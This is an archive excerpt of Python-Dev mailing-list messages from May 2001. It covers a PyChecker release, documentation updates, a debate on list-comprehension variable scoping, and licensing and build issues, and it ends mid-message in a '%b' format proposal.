Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 07:31:01 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig at python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definitely lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one at home.com  Wed May 30 07:51:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig at python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake at acm.org  Wed May 30 07:53:23 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
	<LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Wed May 30 09:47:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>>> globals().keys()
['__builtins__', '__name__', 'name', '__doc__']
>>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.
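To make the "syntactic sugar" correspondence concrete, here is a minimal sketch in modern Python 3 (the function names are hypothetical) of a listcomp with two "for" clauses and an "if" test, next to the loop nest it maps onto clause for clause, left to right:

```python
def listcomp_version(xs, ys):
    # One listcomp: two "for" clauses and an "if" test.
    return [x * y for x in xs if x > 0 for y in ys]


def loop_nest_version(xs, ys):
    # The same computation as the nested statements the listcomp stands for:
    # each "for"/"if" clause becomes one more level of nesting.
    result = []
    for x in xs:
        if x > 0:
            for y in ys:
                result.append(x * y)
    return result


if __name__ == "__main__":
    print(listcomp_version([-1, 2, 3], [10, 20]))   # [20, 40, 30, 60]
    print(loop_nest_version([-1, 2, 3], [10, 20]))  # [20, 40, 30, 60]
```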

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).
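Both points can be checked with plain for loops, which follow the same binding rules as the listcomp clauses. A minimal sketch in Python 3 (Namespace is a hypothetical stand-in for the "class x: pass" above):

```python
class Namespace:
    """Hypothetical stand-in for Tim's `class x: pass`."""


def attribute_target_loop():
    x = Namespace()
    results = []
    # A for-loop target may be any assignable expression, not only a bare name.
    for x.i in range(3):
        results.append(1)
    return results, x.i  # x.i keeps the last value assigned


def reused_name_loops():
    results = []
    # The inner loop rebinds i, but the outer loop advances over its own
    # iterator, so the inner sequence is produced once per outer step.
    for i in range(2):
        for i in range(2, 5):
            results.append(i)
    return results


if __name__ == "__main__":
    print(attribute_target_loop())  # ([1, 1, 1], 2)
    print(reused_name_loops())      # [2, 3, 4, 2, 3, 4]
```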

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>
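Modern Python ints never overflow, so this minimal sketch (Python 3; INT32_MAX and checked_square are hypothetical, assuming a 32-bit C long as on the builds of the day) simulates the overflow explicitly to show an exception handler reading the loop's control variable:

```python
INT32_MAX = 2**31 - 1  # assumption: 32-bit C long


def checked_square(n):
    """Hypothetical helper: square n, raising OverflowError like 32-bit int math."""
    result = n * n
    if result > INT32_MAX:
        raise OverflowError("integer multiplication")
    return result


def squares_until_overflow():
    try:
        for i in range(INT32_MAX):  # explicit loop: i stays bound if the body raises
            checked_square(i)
    except OverflowError:
        # The control variable still holds its value at the time of death.
        return "oops! blew up at %d" % i
    return "no overflow"


if __name__ == "__main__":
    print(squares_until_overflow())  # oops! blew up at 46341
```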

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, simply because there's nothing truly new.
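A minimal sketch (Python 3; function names hypothetical) of how the two candidate models answer question 1. Under the for-loop model the loop binds i, so i is local to the whole function and reading it before the loop raises UnboundLocalError. If the loop variable lives in its own scope (emulated here with a nested function), the first read and the range() argument both see the global i:

```python
i = 12


def f_for_loop_model():
    # The loop below binds i, so the compiler treats i as local to the
    # whole function; this first read therefore raises UnboundLocalError.
    seen = i
    result = []
    for i in range(seen):
        result.append(i)
    return seen, result


def f_own_scope_model():
    # No binding of i in this function, so this read finds the global i.
    seen = i

    def build(n):
        # The loop variable is confined to this nested scope.
        out = []
        for i in range(n):
            out.append(i)
        return out

    return seen, build(i)  # build() receives the global i (12)
```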

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr at thyrsus.com  Wed May 30 10:00:56 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one at home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficent...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas at xs4all.net  Wed May 30 13:14:24 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From jack at oratrix.nl  Wed May 30 14:26:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> 
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have 
different license agreements this may well be a reason for people not to use 
Python because of the hassle of figuring out which pieces fit their own licensing
policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley at cs.uchicago.edu  Wed May 30 15:49:29 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected when I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake at acm.org  Wed May 30 16:03:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
	<15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.
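For comparison, Python 3 (released long after this thread) gives comprehensions their own scope, which matches the behavior described here. A minimal sketch contrasting it with an explicit loop, whose target still rebinds the enclosing name (function names are hypothetical):

```python
def listcomp_keeps_outer_x():
    x = 42
    squares = [x**2 for x in range(2000)]
    return x, squares[-1]  # the comprehension's x did not touch this x


def loop_rebinds_x():
    x = 42
    squares = []
    for x in range(2000):
        squares.append(x**2)
    return x, squares[-1]  # the loop target overwrote x


if __name__ == "__main__":
    print(listcomp_keeps_outer_x())  # (42, 3996001)
    print(loop_rebinds_x())          # (1999, 3996001)
```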

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward at python.net  Wed May 30 16:36:30 2001
From: gward at python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward at python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry at digicool.com  Wed May 30 17:07:12 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
References: <thomas@xs4all.net>
	<20010530131424.Y690@xs4all.nl>
	<20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack at oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because of the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal at lemburg.com  Wed May 30 21:57:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metrowerks compiler on BeOS to
fail and this again causes these defines to be set to 0 !

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 30 22:07:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.
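A minimal sketch of that nested-loop spelling in Python 3 (the function name is hypothetical), using subscriptions of x directly as for-loop targets:

```python
def base3_nested_loops():
    """Nested-loop spelling of the base3 listcomp above."""
    digits = range(3)
    x = [None] * 3
    out = []
    # Each subscription x[k] is a for-loop target, assigned in place on every step.
    for x[0] in digits:
        for x[1] in digits:
            for x[2] in digits:
                out.append(x[:])  # copy, because x is overwritten on the next step
    return out


if __name__ == "__main__":
    result = base3_nested_loops()
    print(len(result), result[0], result[-1])  # 27 [0, 0, 0] [2, 2, 2]
```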

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics) -- apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one at home.com  Wed May 30 22:22:19 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected when I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.
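A minimal sketch of why the lambda model leaves such targets alone, assuming Python 3 and using a nested function in place of the lambda: inside a fresh function scope only bare names become local, so stores through x.i or a subscript still reach objects found in the enclosing scope. Namespace and cells are hypothetical names.

```python
class Namespace:
    """Hypothetical stand-in for Tim's `class x: pass`."""


x = Namespace()
cells = [None]  # hypothetical list used for a subscript target


def run_in_own_scope():
    # Stand-in for (lambda: [...])(): the loops execute in a fresh function scope.
    # Neither target is a bare name, so nothing becomes local here; x and cells
    # are looked up in the enclosing (module) scope and mutated in place.
    result = []
    for x.i in range(3):
        result.append(1)
    for cells[0] in "ab":
        result.append(2)
    return result


if __name__ == "__main__":
    print(run_in_own_scope())  # [1, 1, 1, 2, 2]
    print(x.i, cells[0])       # 2 b
```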

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip at pobox.com  Wed May 30 22:48:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to) a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
	for (i=0; i < 10; i++) {
            dostuffwith(i);
	}
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson at baltimore.com  Wed May 30 23:11:16 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.
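A minimal sketch of the conversion such a format would perform, in Python 3 (to_binary is a hypothetical helper, and negative numbers are deliberately left out): repeated division by 2 yields the bits least significant first, which are then reversed into the usual numeral order.

```python
def to_binary(n):
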